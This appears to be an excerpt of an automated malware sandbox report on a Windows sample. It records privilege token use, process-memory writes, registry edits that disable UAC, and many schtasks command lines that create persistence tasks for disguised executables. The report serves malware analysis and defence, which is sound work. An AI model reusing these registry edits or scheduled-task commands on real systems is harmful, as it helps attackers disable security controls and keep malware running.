N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2360 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\cmd.exe
PID 2360 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\cmd.exe
PID 2360 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\cmd.exe
PID 2876 wrote to memory of 2800 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 2876 wrote to memory of 2800 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 2876 wrote to memory of 2800 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 2876 wrote to memory of 2124 N/A C:\Windows\System32\cmd.exe C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe
PID 2876 wrote to memory of 2124 N/A C:\Windows\System32\cmd.exe C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe
PID 2876 wrote to memory of 2124 N/A C:\Windows\System32\cmd.exe C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe
PID 2124 wrote to memory of 2948 N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe C:\Windows\System32\WScript.exe
PID 2124 wrote to memory of 2948 N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe C:\Windows\System32\WScript.exe
PID 2124 wrote to memory of 2948 N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe C:\Windows\System32\WScript.exe
PID 2124 wrote to memory of 1748 N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe C:\Windows\System32\WScript.exe
PID 2124 wrote to memory of 1748 N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe C:\Windows\System32\WScript.exe
PID 2124 wrote to memory of 1748 N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe C:\Windows\System32\WScript.exe
PID 2948 wrote to memory of 2576 N/A C:\Windows\System32\WScript.exe C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe
PID 2948 wrote to memory of 2576 N/A C:\Windows\System32\WScript.exe C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe
PID 2948 wrote to memory of 2576 N/A C:\Windows\System32\WScript.exe C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe
PID 2576 wrote to memory of 1612 N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe C:\Windows\System32\WScript.exe
PID 2576 wrote to memory of 1612 N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe C:\Windows\System32\WScript.exe
PID 2576 wrote to memory of 1612 N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe C:\Windows\System32\WScript.exe
PID 2576 wrote to memory of 2536 N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe C:\Windows\System32\WScript.exe
PID 2576 wrote to memory of 2536 N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe C:\Windows\System32\WScript.exe
PID 2576 wrote to memory of 2536 N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe C:\Windows\System32\WScript.exe
PID 1612 wrote to memory of 2772 N/A C:\Windows\System32\WScript.exe C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe
PID 1612 wrote to memory of 2772 N/A C:\Windows\System32\WScript.exe C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe
PID 1612 wrote to memory of 2772 N/A C:\Windows\System32\WScript.exe C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe
PID 2772 wrote to memory of 2412 N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe C:\Windows\System32\WScript.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe

"C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Portable Devices\services.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Portable Devices\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 12 /tr "'C:\Users\Default\NetHood\OSPPSVC.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OSPPSVC" /sc ONLOGON /tr "'C:\Users\Default\NetHood\OSPPSVC.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 5 /tr "'C:\Users\Default\NetHood\OSPPSVC.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Recovery\18fc4542-69f6-11ef-a46c-62cb582c238c\Idle.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Recovery\18fc4542-69f6-11ef-a46c-62cb582c238c\Idle.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 10 /tr "'C:\Recovery\18fc4542-69f6-11ef-a46c-62cb582c238c\Idle.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\WmiPrvSE.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 9 /tr "'C:\Windows\AppCompat\Programs\OSPPSVC.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OSPPSVC" /sc ONLOGON /tr "'C:\Windows\AppCompat\Programs\OSPPSVC.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 14 /tr "'C:\Windows\AppCompat\Programs\OSPPSVC.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

